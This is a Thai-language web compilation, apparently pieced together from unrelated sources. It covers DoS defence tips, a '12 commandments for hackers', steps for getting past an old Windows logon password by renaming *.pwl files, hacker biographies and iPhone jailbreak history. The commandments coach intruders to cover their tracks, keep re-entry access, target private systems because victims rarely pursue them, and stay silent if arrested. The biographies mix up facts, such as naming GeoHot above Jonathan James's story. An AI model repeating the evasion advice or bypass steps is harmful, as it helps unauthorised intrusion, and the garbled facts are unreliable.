สร้าง non-advertised secondary DNS server ที่สามารถพร้อม advertise ได้ตลอดเวลา

ผู้โจมตี
หากผู้โจมตีเปลี่ยนเป้าหมายมาเป็น ip address ใหม่ตามที่กำหนด จะทำให้สามารถประมาณการณ์การตั้งรับได้ เช่น
เมื่อผู้โจมตีซึ่งควบคุมการโจมตีเปลี่ยนแปลงคำสั่ง ก็จะทำให้เพิ่มโอกาสในการตามจับตัวได้ง่ายขึ้น
หากมีการจับตาดู traffic จะทำให้เพิ่มโอกาสในการตามจับตัวได้ง่ายขึ้น

URL redirect

หาก ผู้โจมตีทำการโจมตี web server อาจจะพิจารณาใช้การ redirect เพื่อแก้ไขปัญหาได้ โดยการแก้ไข DNS entry เพื่อเปลี่ยน ip address ไปเป็น server ที่ตั้งไว้เพื่อแก้ปัญหาโดยเฉพาะ ซึ่งจะทำ redirection ไปยัง web server ที่แท้จริงไว้ ซึ่งจะทำให้ incoming request ที่เป็นของผู้ใช้ปกติถูก redirect ไปยัง web server ตัวจริง ในขณะที่ traffic ที่เป็นการโจมตีจะไม่ถูก redirect ไป แต่ผู้โจมตีก็สามารถค้นหา ip address ที่แท้จริงของ web server ได้ ดังนั้นจึงควรใช้ network address translation ซึ่งจะช่วยแก้ไขปัญหานี้ได้เป็นอย่างดี

อาจจะ มีการพิจารณาสร้างเส้นทางเชื่อมต่อพิเศษสำหรับ client ที่มีความสำคัญกว่าปกติ เพื่อไม่ให้ได้รับผลกระทบจากเหตุการณ์การโจมตีที่อาจจะเกิดขึ้น

คำแนะนำทั่วไป

จัดหาแบนด์วิดธ์ให้มากกว่าความต้องการใช้งานยามปกติ
สร้างระบบสำรองทั้งระบบเครือข่ายและระบบของเครื่องให้บริการ
ถ้า เป็นไปได้พยายามแยก traffic ให้ออกจากกันให้ได้ เช่น ใช้ ISP คนละแห่งกันสำหรับลิ้งค์ไปยัง web server และลิ้งค์เพื่อใช้งานอินเทอร์เน็ต
ติดต่อ network service provider ในเรื่อง
นำระบบป้องกันการโจมตีแบบ DoS มาใช้
ระบบป้องกัน DoS ที่มีอยู่
ข้อมูลติดต่อในกรณีฉุกเฉิน
ผู้ให้บริการ upstream
ให้กรองข้อมูลที่ไม่มีประโยชน์ทิ้ง เช่น
กรอง private ip addresses เช่น 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
กรอง broadcast address ซึ่งปกติจะลงท้ายด้วย .255 หรือ .0
กรอง loopback address (127.0.0.0/8)
ป้องกันการปลอมแปลง ip address โดยกรองแพ็คเก็ตที่มาจากภายนอกและมี source ip address ตรงกันกับ ip address ในระบบเครือข่ายของตนเอง

เอาล่ะ มาถึงตรงนี้คงพอจะรู้ความหมายของทั้ง Hacker และ Cracker และวิธีกันแล้ว

บัญญัติ 12 ประการสำหรับแฮกเกอร์

1. จงอย่าทำลายข้อมูลใด ๆ ของระบบด้วยความจงใจ
2. จงอย่าพยายามเปลี่ยนแปลงไฟล์ใด ๆ ของระบบ นอกเสียจากว่าจำเป็นต้องทำ เพื่อไม่ให้ถูกแกะรอย หรือเพื่อให้สามารถกลับมาในระบบได้อีกครั้ง
3. จงอย่าทิ้งชื่อจริง หมายเลขโทรศัพท์ไว้บนระบบที่คุณแอบเข้าไป เพราะข้อมูลเหล่านี้จะนำมาซึ่งความไม่ปลอดภัย
4. พึงระวังในการแชร์ข้อมูลกับคนที่คุณไม่รู้จักอย่างแท้จริง ไม่รู้ชื่อ หมายเลขโทรศัพท์ และ อาชีพ
5. อย่าบอกหมายเลขโทรศัพท์ของคุณให้ใครทราบ
6. จงอย่าพยายามแฮกเช้าไปในระบบคอมพิวเตอร์ของรัฐ เนื่องจากระบบเหล่านี้มักมีระบบรักษาความปลอดภัยสูงอยู่แล้ว นอกจากนี้คุณจะถูกตามล่าจนได้ ต่างจากระบบของเอกชนที่มักคำนึงถึงผลกำไรและค่าใช้จ่ายในการตามล่า ถ้าคุณไม่ได้เข้าไปทำลายข้อมูลที่สำคัญแล้ว เขาก็มักไม่เสียเวลามาตามล่าคุณ
7. ไม่มีความจำเป็นที่จะต้องใช้โค้ดหรือรหัสใด ๆ ที่ยาวเกินความจำเป็น
8. จงอย่าตั้งอยู่ในความไม่ประมาท ข้อมูลใด ๆ ที่เก็บอยู่บนฮาร์ดดิสก์ให้พยายามเข้ารหัสเอาไว้เสมอ เพราะถ้าถูกจับจะไม่มีเวลาทำ พยายามซ้อนโน้ตต่าง ๆ ที่จดไว้ในที่ ๆ ปลอดภัย
9. พึ่งระมัดระวังการโพสต์ข้อมูลหรือข่าวบนกระดานข่าว ปกติแล้วแฮกเกอร์มืออาชีพจะไม่โพสต์ข้อมูลใด ๆ ที่เกี่ยวข้องกับระบบที่เขาใช้งานอยู่ หรือถ้าจะโพสต์ก็มักไม่ระบุชัดเจน ส่วนใหญ่เป็นข้อความทั่ว ๆ ไปมากกว่า
10. อย่าที่จะถามคำถามกับแฮกเกอร์ที่มีประสบการณ์มากกว่า แต่ก็อย่าหวังว่าจะมีคนตอบคำถามให้คุณทั้งหมด
11. จงแฮก เริ่มต้นทำ อ่านข้อมูลใด ๆ ก็ได้ที่สนใจ
12. กรณีที่ถูกจับ ขอให้ปิดปากเงียบไว้ก่อน และรีบติดต่อทนาย

วิธีแฮกล็อกออนพาสเวิร์ดของวินโดวส์

เราสามารถแฮกพาสเวิร์ดของวินโดวส์ได้ด้วยวิธีง่าย ๆ หลายทาง ซึ่งผลการแฮกนี้ไม่มีอันตรายหรือก่อให้เกิดความเสียหายกับระบบ
วิธี แรก ทำดังนี้ หลังจากบูตเครื่อง ขณะที่กำลังจะเข้าวินโดวส์ให้คุณกดคีย์ F5 เพื่อบูตเข้าในเซฟโหมด หลังจากนั้นก็ให้เปิด Control Panel แล้วคลิกที่ไอคอน Password เพื่อแก้ไขพาสเวิร์ดใหม่
วิธีที่สอง ทำคล้ายวิธีแรก แต่ให้กดคีย์ F8 เพื่อเข้าไปที่ Startup Menu จากนั้นให้เลือกบูตเข้าที่ดอสพรอมต์ เพื่อเปลี่ยนนามสกุลไฟล์ c:\windows\*.pwl ให้เป็นนามสกุลอื่น เพราะไฟล์ *.pwl จะเก็บข้อมูลต่าง ๆ ของยูสเซอร์แต่ละคน รวมทั้งพาสเวิร์ดด้วย หลังจากนั้นเมื่อบูตเครื่องใหม่ วินโดวส์จะเปิดโอกาสให้คุณตั้งพาสเวิร์ดใหม่เอง กรณีที่ต้องการใช้พาสเวิร์ดชุดเดิมก็เพียงแต่เปลี่ยนนามสกุลไฟล์เดิมกลับมา เป็น .pwl เท่านั้น
วิธีที่สาม ให้คุณใช้บูตดิสก์มาบูตเครื่องแทน เพื่อเข้าไปที่ดอสพรอมต์ จากนั้นก็ทำตามวิธีที่สอง ก็สามารถแก้ไขล็อกออนพาสเวิร์ดของวินโดวส์ได้
บางคนอาจจะงงว่า อะไรคือ แฮกเกอร์หมวกดำ อะไรคือ แฮกเกอร์หมวกขาว ที่จริงมันคือกลุ่มของแฮกเกอร์ที่ใช้เรียกกันครับ โดยจะแบบเป็น 3 ประเภทคือ

1.White-Hat Hacker หรือ พวกหมวกขาว (Hacker) เป็นพวกที่คอยใช้ความสามารถช่วยตรวจตราระบบ และแจ้งเจ้าของระบบว่ามีช่องโหว่ตรงไหนบ้าง เรียกง่ายๆว่า มีจริยธรรมในความเป็น Hacker นั่นเอง ในต่างประเทศมีวิชาที่สอนถึงการเป็น Ethical Hacker (แฮกเกอร์แบบมีจริยธรรม) กันเลยทีเดียว เปรียบให้เห็นภาพก็เหมือนกล้องวงจรปิดที่อยู่ในหอพักนั่นแหละครับ บางทีก็รู้สึกว่ามันจะสอดส่องอะไรเรานักหนา แต่ว่าที่ทำทั้งหมดนั้นก็เพื่อความปลอดภัยของเราเองนั่นแหละ

2.Black-Hat Hacker พวกหมวกดำ (Cracker) เป็นพวกที่นิสัยไม่ดี เป็นพวกที่มีความสามารถเหมือนพวกหมวกขาว (Hacker) ทุกประการ แต่ขาดเรื่องจริยธรรมไปอย่างเดียว(ที่จริงเปลี่ยนแค่ชื่อนั่นแหละ) คนพวกนี้มีความสามารถสูงแต่มีความรู้สึกชอบเอาชนะสูงตามไปด้วย จึงชอบที่จะทำชื่อเสียงโด่งดังด้วยการไป? Hack โน่นนี่ แล้วสร้างความเดือดร้อนให้ชาวบ้าน มักประกาศชื่อตนเองทิ้งท้ายไว้ด้วย (เป็นพวกขาดความอบอุ่น) ยกตัวอย่างง่ายๆเหมือนพวกขี้เมากินเหลานั่นแหละครับ บางทีก็ตั้งใจกินเหล้าเสียดังเพื่อกวนประสาทคน แต่บางที่ก็ไม่ได้ตั้งใจ แต่ที่ทำไปเพราะกูมาววล้วนๆ ไม่ว่ายังมันก็ยังทำคนอื่นเดือดร้อนอยู่ดี หรือจะเอาให้ชัดกว่านี้ก็พวกชอบเขียนกำแพงด่าพ่อกันนั่นแหละครับ แต่ก็ต้องยอมรับอย่างหนึ่งว่า Black-Hat ทั้งหลายที่มีอยู่นั้นเก่งฉกาจช่างหัวใส คิดค้นวิธี Hack ระดับมหาพระกาฬพิสดารกว่าคัมถีร์เปลี่ยนเส้นเอ็นออกมาทำให้วงการ Security ต้องตื่นตัวตามไปด้วย

3.Script-Kiddies แปล ตรงๆตัวก็คือ พวกที่ดีแต่แต่ใช้อาวุธ รักสบายอยากเจาะระบบแต่ไม่อยากศึกษาระบบ ใช้เครื่องมือต่างๆในการเจาะระบบ เอาสะดวกเข้าว่า แล้วก็เรียกตัวเองว่าเป็น hacker แต่ที่จริงเป็นแค่หนอนแมลงชั้นต่ำของวงการที่ทำให้วงการ Hacker เสียชื่อเสียงอยู่ทุกวันนี้ คนพวกนี้จะมีความรู้แค่ขี้ฟันเห็บ แต่ไปโหลดโปรแกรมที่พวก Hacker เค้าใช้งานกัน มาใช้เองบ้าง ซึ่งแย่หน่อยที่ในวงการ Hacker มีพวกนี้อยู่กว่า 95% เลยทีเดียว เปรียบได้กับพวกตัวประกอบอดทนในหนังที่มีบทแค่วิ่งผ่านกล้องไปวันๆ แบบเช่น วิ่งมา อ้ากก!!!!!!!!แล้วก็ตาย  รับเงินปายยเกริ่นมาเยอะแล้ว เรามาดูโฉมหน้า Balck-Hat Hacker / White-Hat Hacker ระดับโลก กันดีกว่าครับ

ตำนาน Hacker ระดับโลก

ตำนาน  Black-hat Hacker ระดับโลก


Jonathan James

ถ้า จัดทำเนียบ Hacker ที่โด่งดังที่สุดในยุคนี้ ต้องนับเจ้าหนูน้อยมหัศจรรย์ GeoHot เข้าไปด้วยเสมอ ตอน ที่หมอนี่โดนจับ ทั่วทั้งอเมริกาแตกตื่น เพราะหมอนี่อายุเพียง 15 ปีเท่านั้น(เวรตูยังดูการ์ตูนช่องเก้าอยู่เลย) Jonathan James หรือชื่อรหัสในโลก Hacker ก็คือ c0mrade ได้สร้างชื่อด้วยการเจาะระบบมากมาย ตั้งแต่บริษัทโทรศัพท์ BellSouth ไปจนถึงหน่วยงาน DTRA ในกระทรวงกลาโหมสหรัฐ และที่ยิ่งใหญ่ที่สุดในปี 1999 หมอนี่ Hack เข้าไปฝังตัว Backdoor ใน Nasa ซึ่งทำให้อ่านข้อมูลลับได้มากมายรวมไปถึงขโมยโปรแกรมที่ทาง Nasa พัฒนาขึ้นด้วยเงินมหาศาลถึง 1.7 ล้านดอลล่าร์สหรัฐไปหน้าตาเฉย ซึ่งในภายหลังทาง Nasa ต้องปิดระบบถึงสามสัปดาห์เพื่อแก้ไข ทำให้สูญเสียเงินไปอีก 41,000 $??ปล. หมอนี่บอกกับศาลว่า เค้าอยากได้โปรแกรมมาเพื่อฝึกฝีมือภาษา C ของตัวเองเท่านั้น แต่พอขโมยมาได้ ก็กลับถามว่าโปรแกรมห่วยๆนั่นมีค่าถึง 1.7 ล้านดอลล่าร์เลยเชียวหรือ


Adrian Lamo

อี ตานี่ก็เป็นอีกหนึ่ง Hacker ที่แสบไม่แพ้กัน ซึ่งคนที่โดน Adrian Lamo เจาะเข้าไป ก็มีตั้งแต่ หนังสือพิมพ์ The New York Times , Microsoft , Yahoo , Bank of America , CitiGroup และ Cingular ซึ่งที่ๆสร้างชื่อเสียงที่สุดให้เขาก็คือ การที่เขาเจาะเข้าไปใน The New York Times และเอาชื่อตัวเองเข้าไปใส่ไว้ใน แหล่งข่าวที่เชื่อถือได้ระดับสูงของหนังสือพิมพ์ The New York Times และใช้บัญชีของนักเขียนชื่อดัง LexisNexis ในการค้นคว้างานวิจัยจากฐานข้อมูลของ The New York Times อีกด้วย หลังจากที่ใช้กรรม ไปมากมาย ตอนนี้ Adrian Lamo ทำงานเป็นนักข่าว และนักพูด เกี่ยวกับวงการ Hacker และพึ่งจะได้รับรางวัลนักข่าวยอดเยี่ยมมาไม่นานนี้เอง


Kevin Mitnick

นี่ คือชายที่ครั้งหนึ่ง กระทรวงยุติธรรมของสหรัฐเคยหมายหัวไว้ว่า ?อาชญากรทางคอมพิวเตอร์ที่ทางสหรัฐต้องการตัวมากที่ส ุด? เพราะเขาคือคนแรกที่ทำให้คำว่า Hacker โด่งดังไปทั่วโลกจนถึงทุกวันนี้ ผลงานของ Mitnick อาจจะเก่าไปซักหน่อย เพราะพี่ท่านเล่น Hack มาตั้งแต่ช่วงปี 70? กับผลงานการเจาะระบบ Punch Card ของ Los Angeles Bus System ทำให้เขาสามารถขึ้นรถเมล์ได้ฟรีตั้งกะอายุ 12. เข้าไปป่วนระบบโทรศัพท์ทำให้โทรทางไกลได้ฟรีๆ จากนั้นก็ ขโมยข้อมูลของบริษัทคอมพิวเตอร์ชื่อดังอย่าง DEC (Digital Equipment Corporation) ตามด้วยหน่วยงานด้านการรักษาความปลอดภัยแห่งชาติ โอ๊ย อีตานี่แสบๆๆ หลังจากที่ไปรับกรรมในคุกอยู่สองปีครึ่ง ตอนนี้เค้าก็กลายเป็น Hacker ที่หลายๆบริษัทขอความช่วยเหลือในการตรวจสอบระบบครับ( และสำคัญมากเป็นเพราะอีตานี่เองที่ทำให้โลกเราได้รู้ จัก White-Hat สาดเลือดเอเชียที่เก่งกาจ)


Kevin Poulsen

มี ชื่อเรียกสวยเก๋ในวงการแฮกเกอร์ว่า Dark Dante, ผลงานเด่นๆของ Kevin Poulsen ก็คือการที่เค้าเจาะระบบโทรศัพท์ของสถานีวิทยุ KIIS-FM ใน LA ทำให้เค้าได้รางวัลรถ Porsche มาครอง และที่เด่นๆ ก็คือ อีตานี่แหย่หนวดเสือไป เจาะระบบฐานข้อมูลของ FBI ครับ และที่สำคัญก็คือ ระบบดักฟังของ FBI ครับ หลังจากที่ Kevin Poulsen โดนซิวไป 5 ปี ตอนนี้เค้าก็กลายเป็น นักข่าวอาวุโสของสำนักข่าว Wired News และคอยช่วยเหลือในการไล่จับพวก BlackHat คนอื่นๆอีกมากมาย http://www.kevinmitnick.com มีการเอาเรื่องของเค้ามาสร้างหนัง


Robert Tappan Morris

เค้า คือลูกชายของอดีตเจ้าหน้าที่วิทยาศาสตร์ขอ ง NSA (National Security Agency) แท้ๆแต่ดันใช้ความรู้ในทางที่ผิดก่อความเดือดร้อนให้ ชาวบ้านไปทั่ว เพราะหมอนี่แหละครับคือคนแรกที่สร้าง Worm ขึ้นมา และทำให้ระบบเครือข่ายพังทลายไปหลายวันเลยทีเดียว ขณะที่ Morris กำลังเรียนอยู่ที่ Cornell เค้าอยากรู้ว่าอินเทอร์เน็ตมันใหญ่ขนาดไหน เค้าก็เลยสร้างโปรแกรมที่มันจะเจาะไปได้เรื่อยๆ ไปๆมาๆ นั่นกลายเป็นเวิร์มตัวแรกของโลกที่ชื่อว่า MorrisWorm หลังจากนั้นคอมพิวเตอร์กว่า 6,000 เครื่องทั่วโลกก็เจ๊งยับ เพราะเวิร์มของหมอนี่ พอโดนจับ Morris ก็โดนลงโทษจำคุก 3 ปีและโดนค่าปรับ 10,500 เหรียญและ ทำงานช่วยเหลือสังคมอีก 400 ชม.(ลงโทษขนาดนี้ แรงไปไหมพี่ เบากว่านี้ได้อีกนะ) และหลังจากที่รับกรรมไปแล้ว ตอนนี้ Robert Morris ก็เป็นอาจารย์สอนหนังสืออยู่ที่ MIT ครับ

ตำนานฝั่งหมวกขาว White-Hat Hacker


Stephen Wozniak

พูด ถึง Apple Computer ใครๆก็อาจจะนึกถึง Steve Jobs ชายหนุ่มหัวแอบล้านซึ่งหลายๆคนรอคอย KeyNote ของเค้าในงาน MacWorld Conference ทุกปี แต่หารู้ไม่ว่าจริงๆแล้วถ้า Apple Computer ขาดเค้าคนนี้ไปล่ะก็ มันจะไม่มีวันนี้แน่นอน เพราะ Steve Wozniak คือผู้่ร่วมก่อตั้ง Apple Computer ครับ?การเป็น Hacker ช่วงแรกของเค้าอยู่ที่ เค้าได้ไปอ่านบทความเรื่องการเจาะระบบโทรศัพท์ในหนัง สือ Esquire เข้า หลังจากที่คุยกับ Steve Jobs พวกเขาก็ได้คิดค้น BlueBox เครื่องเจาะระบบโทรศัพท์ที่ทำให้คุณสามารถ โทรทางไกลได้ฟรีๆ (เอาเข้าไป) มีครั้งหนึ่ง Steve Wozniak ได้แอบใช้เครื่อง BlueBox โทรหาพระสันตปาปา โดยปลอมตัวว่าเป็น Henry Kissinger รัฐมนตรีกระทรวงการต่างประเทศของสหรัฐในตอนนั้น แสบจริงๆ?สำหรับช่วงแรกของการก่อตั้ง Apple Computer. Wozniak ได้ขายเครื่องคิดเลขแสนแพงของเขา และ Jobs ได้ขายรถแวนของเขา เพื่อเป็นทุนในการก่อตั้ง Apple Computer ครับ และสุดทเครื่อง Apple I ก็วางตลาด และทั้งคู่ได้ขายเครื่องนี้ในราคาเครื่องละ 666.66$ (เลขซาตานชัดๆ)


Tim Berners-Lee

ต้อง ขอบอกว่า ถ้าไม่มีอีตานี่โลกเราจะไม่มีคำว่า World Wide Web ครับ เพราะเค้าคนนี้คือ คนที่ คิดค้น www ขึ้นบนโลก. Tim Berners-Lee เป็นลูกของสองนักคณิตศาสตร์ระดับโลก Convey และ ?Mary Berners-Lee ซึ่งเป็นทีมสร้างเครื่องคอมพิวเตอร์ Manchester Mark 1 เครื่องคอมพิวเตอร์รุ่นแรกๆของโลก?ในปี 2532 Tim Berners-Lee ทำงานเป็น FreeLance อยู่ที่ CERN (ศูนย์วิจัยเรื่องนิวเคลียร์ของยุโรป) ซึ่งเป็นเครือข่ายอินเทอร์เน็ตที่ใหญ่ที่สุดของยุโรป เขาได้คิดค้นระบบข้อความหลายมิติ (Hypertext) ขึ้นมา ซึ่งเมื่อมันผนวกเข้ากับ TCP และ DNS ล่ะก็ มันจะเป็นความสุดยอดของ HyperText แน่นอน และหลังจากนั้นมันจึงกลายเป็น ?World Wide Web ครับ เมื่อปี 2548 เขาได้รับรางวัล 1 ในร้อยบุคคลที่ทรงอิทธิพลต่อคนทั้งโลกมากที่สุด และในปี 2550 Tim Berners-Lee ได้รับพระราชทานเครื่องราชอิสริยาภรณ์ฝ่ายหน้า จากสมเด็จพระบรมราชินีเอลิซาเบทที่สอง เป็นการส่วนพระองค์ ทำให้ตอนนี้เค้ากลายเป็น Sir Tim Berners-Lee ไปแล้วครับ ผลงานการ Hack ของ Tim Berners-Lee ไม่เป็นที่ปรากฏ แต่ว่า เรื่องนี้ก็ทำให้เค้าโดนไล่ออกจากมหาวิทยาลัย Oxford ล่ะครับ

ปล. เว็บไซต์แรกของโลกคือ


สร้างขึ้นโดย Tim Berners-Lee นี่แหละ


Linus Torvalds

บิดา ผู้ให้กำเนิด Linux ระบบปฏิบัติการ Unix ที่คนนิยมกันมากที่สุดในโลกขณะนี้ ในปี 1991 ขณะที่เขายังเป็นนักศึกษามหาวิทยาลัย เฮลซิงกิ เขาได้สร้าง linux kernel ขึ้นจากพื้นฐานของระบบปฏิบัติการ Minix ขึ้น หลังจากนั้น เขาก็รวบรวมสมัครพรรคพวกมาช่วยกันเขียน และช่วยกันพัฒนาต่อกันทางอินเทอร์เน็ต โดยที่เขาเป็นคนรวบรวม ตรวจสอบ และแจกจ่ายงานไปยังโปรแกรมเมอร์ต่างๆทั่วโลก รวมถึงแจกจ่ายให้คนช่วยกันเอาไปใช้ฟรีๆอีกด้วย จุดที่น่าสนใจของโครงการนี้ก็คือ ทุกคนที่มาร่วมทำนั้น ทุกคนยินดีช่วยโดยไม่ได้ค่าตอบแทนแต่อย่างใด และมีเงื่อนไขต่อด้วยอีกว่า เมื่องานเสร็จแล้วจะต้องเผยแพร่ตัว Source Code แก่สาธารณะโดยไม่คิดมูลค่าเช่นเดียวกันครับ?ทุกวันนี ้ Linux Torvalds ทำงานอยู่ที่บริษัท Transmeta บริษัทที่ทำหน้าที่ออกแบบ CPU และยังคงดำรงตำแหน่ง ผู้นำของบรรดาผู้ใช้งานและพัฒนา Linux ทั้งโลกครับ ยิ่งไปกว่านั้น หนังสือ Times Magazine ได้ยกให้เค้าเป็น หนึ่งคนในหนังสือชื่อ 60 Years of Hero สุดยอดดดดดดด


Richard Stallman

ผู้ ริเริ่มโครงการ GNU (อ่านว่า กนู นะ) และมูลนิธิซอฟท์แวร์เสรี รวมไปถึงผู้ริเริ่มแนวคิดเรื่อง Copyleft (ฮ่า) และเป็นผู้ร่างสัญญาอนุญาติให้ใช้ได้ทั่วไป และต่อในภายหลัง สัญญานี้ได้กลายเป็น บรรทัดฐานซอฟท์แวร์เสรีจำนวนมาก ความเป็นแฮกเกอร์ของเค้าโผล่มาตอนที่เค้าทำงานอยู่ที ่ MIT ในฐานะของ Staff Computer ทุกครั้งที่มีระบบอะไรใหม่ๆติดตั้งเข้าไปและมีรหัสผ่ านกำกับอยู่ Richard Stallman จะหาทางแฮกและปลดรหัสผ่านออกทุกครั้ง ยังครับยังไม่พอ พอแฮกระบบเสร็จก็แฮก Printer ต่อเพื่อพิมพ์ข้อความบอกชาวบ้านว่าระบบไหนอยู่ที่ไหน ปลดรหัสผ่านอะไรไปแล้วบ้าง แสบจริงๆ


Tsutomu Shimomura

สุด ยอด White-Hat สายเลือดเอเชีย Tsutomu Shimomura ได้รับชื่อเสียงอย่างโด่งดัง ในฐานะที่ร่วมมือกับ John Markoff ในการช่วยเหลือ FBI ไล่จับสุดยอดแฮกเกอร์ของโลกในยุคนั้น นั่นก็คือ Kevin Mitnick นั่นเอง ?Tsutumu ทำงานเป็นนักวิจัยอยู่ที่ SDSC (San Diego Supercomputer Center) ซึ่งจริงๆแล้วก็โดนอีตา Kevin เข้ามาแฮกเอาโปรแกรมและเมล์สำคัญๆไป ดังนั้นด้วยคาวมแค้นเขาจึงร่วมมือกับ FBI ไล่จับ Kevin Mitnick ซึ่งต่อมาเมื่อเขาจับได้ เขาก็เลยเขียนหนังสือชื่อ Takedown เป็นเรื่องราวของการไล่จับ Kevin Mitnick ซึ่งต่อมาได้ถูกนำมาสร้างเป็นภาพยนตร์เรื่อง TakeDown ด้วย

iPhone ที่ขายในหลายประเทศนั้น Apple จะล็อกฮาร์ดแวร์ให้ใช้ได้กับ operator เฉพาะครับ ไม่สามารถนำไปใช้กับเจ้าอื่นได้ แลกกับราคาเครื่องที่ถูกลง
Operator จะขายเครื่องล็อกในราคาถูก แล้วใช้ผูกสัญญาเอากับผู้ใช้ เช่น ต้องใช้ไป 2 ปีเป็นต้น (Operator ต้องจ่ายค่าเครื่องชดเชยให้ Apple ด้วย)
บรรดาผู้ใช้จำนวนหนึ่งยอมจ่ายเงินเพื่อเลิกผูกสัญญา แล้ว Hack เครื่องเอาไปขายนอกประเทศ ทำแบบนี้ยังพอมีกำไรส่วนหนึ่ง...
และในบางประเทศที่ไอโฟนออกช้า ก็มีผู้ยอมจ่ายราคาแพงเพื่อซื้อเครื่อง Hack เหล่านี้ครับ
ส่วนเมืองไทยนี่แปลกมาก ขายเครื่องไม่ล็อก แต่ผูกสัญญาได้ด้วย..ผมไม่ค่อยเข้าใจนัก เพราะไม่เคยซื้อ วิธีซื้อมันยากไป สติปัญญาไม่ถึง
ว่าไปแล้วการ Hack นี้ไม่ใช่เพื่อเอาไปขายอย่างเดียว แต่มีเหตุผลมากกว่านั้น...
อันแรกคือ จะได้ใช้ซอฟต์แวร์เถือนได้...อันนี้เลยเป็นสาเหตุใหญ่ที่บ้านเรา Hack กันเป็นส่วนใหญ่...
อีกอย่างคือ Apple จำกัดความสามารถของโปรแกรมไว้ระดับหนึ่ง การ Hack ทำให้เปิดความสามารถดังกล่าวให้โปรแกรมบางประเภทใช้ได้...
Apple กันไว้เพราะไม่ต้องการให้บรรดาซอฟต์แวร์เข้าไปยุ่งกับข้อมูลส่วนตัวของผู้ ใช้ เช่น ที่อยู่ เบอร์โทร รูปลับเฉพาะ คลิปส่วนตัว อะไรเทือกนี้
การ ที่ ปล่อยให้โปรแกรมของใครต่อใครเข้าถึงข้อมูลเหล่านี้ได้หมด ก็จะเห็น คลิปมากมาย กระจายไปทั่วเน็ตได้ Apple เลยกันไว้ แต่คนใช้ไม่เข้าใจ
อยาก เล่นโปรแกรมเถือนก็ต้องแลกกับความเสี่ยง จำไว้นะครับ มันอันตรายต่อการได้เป็นดารายอดฮิตได้ง่ายๆ เพียงเพื่อแลกกับการเล่น bejewel ฟรี...555
การ Hack ใน iPhone นี่ต้องทำสามอย่างครับ Jailbreak, unlock และ activate
ไอโฟนนั้นป้องกันไม่ให้โปรแกรมที่เราเขียนขึ้น เข้าไปเขียนหน่วยความจำที่เป็นของระบบ และใช้ features หลายอย่างไม่ได้
การทำให้โปรแกรมต่างๆสามารถเข้าถึงหน่วยความจำของระบบและ features ที่ไม่อนุญาตเหล่านั้น เรียกว่าการทำ “Jailbreak”
หลัง จากทำ Jailbreak แล้ว ก็ต้องเข้าไปแก้ bootloader ซึ่งเป็นตัวเชื่อมสัญญาณ ให้ใช้งานกับ operator ได้อย่างเสรี กระบวนการนี้เรียกว่า “Unlock”
นอกจาก Unlock แล้ว Hacker ต้องหลอกระบบว่า SIM นี้เป็น SIM ที่ Apple โอเคให้ใช้ได้ เรียกกระบวนการนี้ว่า “Activate”
Apple ประกาศตัวไอโฟนตัวแรกวันที่ 9 มกราคม 2007 และขายครั้งแรกในวันที่ 29 มิถุนายน 2007 เครื่องในอเมริกาล็อกกับ AT&T ครับ
ไม่ถึง 2 เดือนหลังจากออกขาย วันที่ 21 สิงหาคม 2007 geohot ก็ประกาศใน blog (http://iphonejtag.blogspot.com/) ว่าทำการ unlock ไอโฟนสำเร็จแล้ว
การ Hack ครั้งนั้นทำโดยทีม Hacker 5 คน ซึ่ง GeoHot เป็นหนึ่งในนั้น โดย Hack ให้เครื่อง AT&T สามารถใช้กับ SIM ของ operator ใดๆก็ได้
การ Hack ครั้งแรกนี้ยังต้องใช้หัวแร้งบัดกรีบางจุดอยู่ครับ แต่ไม่ต้องใช้ SIM พิเศษ (ก่อนนี้มี SIM เลียนแบบ AT&T มาหลอกให้ไอโฟนทำงานได้แล้ว)
Hacker ทั้งห้านี้ต่อมาก็คือ iPhone Dev Team ครับ Hotz อยู่ในกลุ่มนี้ด้วย แต่ตอนหลังถูกเพื่อนๆในกลุ่มแบน ไล่ออกจากกลุ่ม หมาหัวเน่าว่างั้นเหอะ
การ hack ครั้งแรกนี้ Hotz เล่าว่าเค้าซื้อไอโฟนตั้งแต่วันแรกที่มันออกขาย และใช้เวลาในการ Hack ไปทั้งหมดประมาณ 500 ชั่วโมง
ไอ โฟนเครื่องแรกที่ unlock ได้นี้ Hotz ขายให้กับ Terry Daidone ผู้ก่อตั้ง Certicell โดยแลกกับ Nissan350Z คันนึงกับไอโฟน 8GB อีก 3 ตัว
ไอโฟน 3 ตัวที่ได้มาก็เอามาแจกให้กับสมาชิกทีม Hacker ที่ช่วยกันทำการ Hack ในครั้งนั้นจนสำเร็จนั่นเอง
ต่อมาบรรดา Hacker ก็พัฒนาเทคนิคการ Hack ไอโฟนจนใช้เพียงซอฟต์แวร์เท่านั้น วิธีแรกของ Hotz ที่ต้องเปิดฝาเครื่องก็เลยหมดความนิยมไป
ในช่วงปี 2008 ก่อนที่จะมีการออก SDK สมาชิกคนหนึ่งของ iPhone Dev Team ก็ออกจากกลุ่มไป นายคนนี้มีฉายาว่า Zibri
Zibri ออกจาก iPhone Dev Team ไปพร้อมกับ source code การ Hack ของกลุ่มด้วย ไปสร้างเวปแจกโปรแกรม Ziphone สำหรับ unlock ไอโฟน โม้ว่าเขียนเอง
Zibri ทำเงินจาก Ziphone โดยรับเงินบริจาคจากผู้ใช้ ว่ากันว่าทำเงินได้มากหลายล้านเหรียญทีเดียว
ช่วง นั้นทุกคนแปลกใจมากที่ Dev Team เงียบสนิท ไม่มีการตอบโต้ใดๆ มีแค่ข่าวรั่วในหมู่ Hacker ว่า Zibri ใช้ source code ที่ขโมยออกมาเท่านั้นเอง
ในภายหลัง Similarities สมาชิกคนที่ทำ source code ส่วนนี้ออกมาแฉซะหมดเปลือก และดูถูกถากถาง Zibri จนในวงการ Hacker เห็นไส้พุง Zibri หมด
Ziphone นั้นใช้วิธีที่อาศัย Bug ของ iBoot ของ Apple โดยเอา ramdisk ของ Apple มาแก้ไขแล้วส่งกลับเข้าไปใน iPhone
วิธี นี้ได้ผล แต่มีข้อเสียคือใน Ziphone มีส่วนของโปรแกรมของ Apple อยู่ด้วย ซึ่งผิดกฎหมาย อาจต้องไปนอนคุกได้ง่ายๆ iPhone Dev Team เลยไม่ทำ
อีก อย่างวิธีนี้ใช้ memory ใน Ramdisk สูงไม่สามารถลงโปรแกรมเพิ่มเติมได้ ในยุครุ่งเรืองของ Ziphone เราจึงไม่เห็นโปรแกรมแบบ Cydia เพราะใหญ่เกิน
